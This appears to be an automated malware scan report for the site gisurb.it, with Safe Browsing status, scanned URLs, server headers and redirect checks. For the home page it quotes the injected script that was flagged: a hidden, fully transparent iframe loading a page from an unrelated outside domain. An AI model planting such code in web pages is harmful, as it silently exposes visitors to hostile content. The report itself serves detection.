Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=gisurb.it
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
| Request | Server response | Status |
http://gisurb.it/ | HTTP/1.1 301 Moved Permanently Connection: close Date: Thu, 08 Jan 2015 08:30:38 GMT Location: http://www.gisurb.it/ Server: Apache Content-Length: 229 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.gisurb.it/ | HTTP/1.1 200 OK Date: Thu, 08 Jan 2015 08:30:38 GMT Accept-Ranges: bytes ETag: "d016da6dedd6cd1:50b393" Server: Microsoft-IIS/6.0 Content-Length: 9493 Content-Location: http://www.gisurb.it/index.htm Content-Type: text/html Last-Modified: Mon, 10 Dec 2012 15:45:50 GMT MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET | clean |
http://www.gisurb.it/index.htm | 200 OK Content-Length: 9493 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<style>.vb_style_forum {filter: alpha(opacity=0);opacity: 0.0;width: 200px;height: 150px;}</style><div class="vb_style_forum"><iframe height="150" width="200" src="http://www.iws-leipzig.de/contacts.php"></iframe></div>'); Antivirus reports:
| ||
http://www.gisurb.it/subnavig.js | 404 Not Found Content-Length: 1635 Content-Type: text/html | clean |
http://www.gisurb.it/test404page.js | 404 Not Found Content-Length: 1635 Content-Type: text/html | clean |
http://gisurb.it/gen_subnavig.js | HTTP/1.1 301 Moved Permanently Connection: close Date: Thu, 08 Jan 2015 08:30:39 GMT Location: http://www.gisurb.it/gen_subnavig.js Server: Apache Content-Length: 244 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.gisurb.it/gen_subnavig.js | 404 Not Found Content-Length: 1635 Content-Type: text/html | clean |
http://gisurb.it/mouseover.js | HTTP/1.1 301 Moved Permanently Connection: close Date: Thu, 08 Jan 2015 08:30:39 GMT Location: http://www.gisurb.it/mouseover.js Server: Apache Content-Length: 241 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.gisurb.it/mouseover.js | 404 Not Found Content-Length: 1635 Content-Type: text/html | clean |
http://gisurb.it/ml.js | HTTP/1.1 301 Moved Permanently Connection: close Date: Thu, 08 Jan 2015 08:30:39 GMT Location: http://www.gisurb.it/ml.js Server: Apache Content-Length: 234 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.gisurb.it/ml.js | 404 Not Found Content-Length: 1635 Content-Type: text/html | clean |
http://adminsitebuilder.aruba.it/reseller_staging/1001/2.js | 404 Not Found Content-Length: 314 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: gisurb.it
Result:
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Thu, 08 Jan 2015 08:30:38 GMT
Location: http://www.gisurb.it/
Server: Apache
Content-Length: 229
Content-Type: text/html; charset=iso-8859-1
...229 bytes of data.
GET / HTTP/1.1
Host: gisurb.it
Result:
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Thu, 08 Jan 2015 08:30:38 GMT
Location: http://www.gisurb.it/
Server: Apache
Content-Length: 229
Content-Type: text/html; charset=iso-8859-1
...229 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: gisurb.it
Referer: http://www.google.com/search?q=gisurb.it
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: gisurb.it
Referer: http://www.google.com/search?q=gisurb.it
Result:
The result is similar to the first query. There are no suspicious redirects found.